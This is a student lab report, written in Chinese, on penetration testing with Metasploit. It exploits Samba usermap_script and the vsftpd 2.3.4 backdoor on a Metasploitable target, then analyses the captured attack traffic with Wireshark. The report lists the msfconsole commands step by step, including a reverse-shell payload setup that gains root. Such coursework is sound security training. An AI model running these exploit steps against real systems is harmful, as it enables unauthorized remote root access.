1.实践内容：

（1）使用Metasploit进行Linux远程渗透攻击
任务：使用Metasploit渗透测试软件，攻击Linux靶机上的Samba服务Usermap_script安全漏洞，获取目标Linux靶机的主机访问权限。实践步骤如下：
①启动Metasploit软件，可根据个人喜好使用msfconsole、msfgui、msfweb之一；
②使用exploit：exploit/multi/samba/usermap_script渗透攻击模块；
③选择攻击PAYLOAD为远程shell，（正向或反向连接均可）；
④设置渗透攻击参数（RHOST，LHOST，TARGET等）；
⑤执行渗透攻击；
⑥查看是否正确得到远程Shell，并查看获得的权限。
（2）实践作业：攻防对抗实践
攻击方：使用 Metasploit ，选择 Metasploitable 靶机中发现的漏洞进行渗透攻击，获得远程控制权，并尝试进一步获得root权限。
防守方：使用 tcpdump/wireshark/snort 监听获得网络攻击的数据包文件，结合 wireshark/snort 分析攻击过程，获得攻击者的IP、目标IP和端口、攻击发起时间、攻击利用漏洞、使用Shellcode、以及成功之后在命令行输入的信息。

2.实践过程

2.1 使用Metasploit进行Linux远程渗透攻击

实验环境：
攻击机kali 192.168.200.5
靶机 Metasploitable 192.168.200.130

打开kali，输入命令ping 192.168.200.130, 连通性正常

输入msfconsole,启动Metasploit软件

选择渗透攻击模块：输入use exploit/multi/samba/usermap_script 选择针对usermap_script 漏洞的渗透攻击模块

输入show payloads，列举负载模块

输入set payload cmd/unix/reverse，选择18号攻击负载模块TCP（reverse）

使用show options 查看参数，可见需要配置靶机和攻击机IP
输入set LHOST 192.168.200.5设置攻击机为kali 2023，输入set RHOST 192.168.200.130设置靶机为Metasploitable2

再次输入show options查看是否配置成功

输入exploit开始攻击

输入ifconfig查看靶机IP与真实IP一致，说明渗透攻击成功。输入whoami查看获得权限为root

2.2 攻防对抗实践

2.2.1 作为攻击方

攻击机kali 20232940cb 192.168.1.112
靶机meta 20232909why 192.168.1.110

打开metasploit

寻找漏洞代码 （vsftpd），如果对方机器被扫描出 vsftpd 这种漏洞存在

选择渗透攻击模块：输入use exploit/unix/ftp/vsftpd_234_backdoor

输入show payloads，列举负载模块

设置set payload cmd/unix/interact

使用show options 查看参数

需要配置靶机192.168.1.110和攻击机IP192.168.1.112，再次输入show options查看是否配置成功
并输入exploit开始攻击

输入ifconfig查看靶机IP与真实IP一致，说明渗透攻击成功

输入who am i查看权限为root

2.2.2 作为防守方

攻击机kali 20232909why 192.168.1.115
靶机meta 20232940cb 192.168.1.110

通过对数据包流量及数据包内容的分析，可以看出攻击者IP 为192.168.1.115，目标IP为192.168.1.110,攻击端口为6200，查询可知这是针对Vsftpd 2.3.4漏洞的攻击

查看TCP建立连接时间，如图，2024年5月8日晚14：49：52

使用的shellcode，在wireshark抓包的过程中我们可以看到shellcode，先id确定自己的权限,之后nohup >/dev/null 2>&1,将标准输出以及错误输出一起重定向到/dev/null，之后对 echo cZyuPTDirlCot0aE写入一个东西，进一步获取相关权限
攻击之后本地执行的指令：从抓包的流可以看出来攻击者的每一条命令，ifconfig以及whoami。

3、学习中遇到的问题及解决

问题1：扫描meta_ubuntu后发现没有vsftp漏洞，攻防实践时漏洞利用不成功
问题1解决方案：攻击机和靶机设置错误

4、实践总结

本次实验和上次实验方法大体一致，通过此次实验我更加熟悉了Samba安全漏洞、Metasplout。在本次实验中，我深入掌握了Metasploit的使用，并在实际的攻防演练中，逐步完成了从漏洞探测、利用、渗透到最终获取目标主机控制权的全过程，极大地锻炼了实战技能。同时，实验也让我深刻理解了漏洞的严重威胁，揭示了即便是一个不起眼的漏洞也可能成为权限获取的入口。因此，需要及时修复系统漏洞，保障网络安全。